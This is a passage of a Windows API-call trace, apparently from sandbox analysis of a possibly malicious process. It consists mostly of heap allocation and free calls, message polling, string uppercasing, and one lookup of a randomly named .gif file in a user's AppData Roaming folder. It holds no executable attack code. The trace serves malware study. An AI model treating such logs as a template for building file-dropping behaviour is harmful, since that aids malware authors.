(HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0122.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0122.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0122.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0122.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0122.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0122.376] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0122.376] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0122.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0122.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0122.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0122.377] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0122.377] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0122.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0122.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0122.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0122.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0122.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0122.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0122.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0122.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0122.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0122.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0122.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0122.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.380] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0122.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0122.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0122.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0122.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0122.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.381] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/F74jGmHWDSdyxplK8Zu.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6173d640, ftCreationTime.dwHighDateTime=0x1d5d355, ftLastAccessTime.dwLowDateTime=0x400efdf0, ftLastAccessTime.dwHighDateTime=0x1d5ca26, ftLastWriteTime.dwLowDateTime=0x400efdf0, ftLastWriteTime.dwHighDateTime=0x1d5ca26, nFileSizeHigh=0x0, nFileSizeLow=0x13aff, dwReserved0=0x0, dwReserved1=0x0, cFileName="F74jGmHWDSdyxplK8Zu.gif", cAlternateFileName="F74JGM~1.GIF")) returned 0x9a4a40 [0122.381] FindClose (in: hFindFile=0x9a4a40 | out: hFindFile=0x9a4a40) returned 1 [0122.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0122.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0122.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0122.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0122.383] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.383] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.383] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.383] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0122.383] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.383] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: 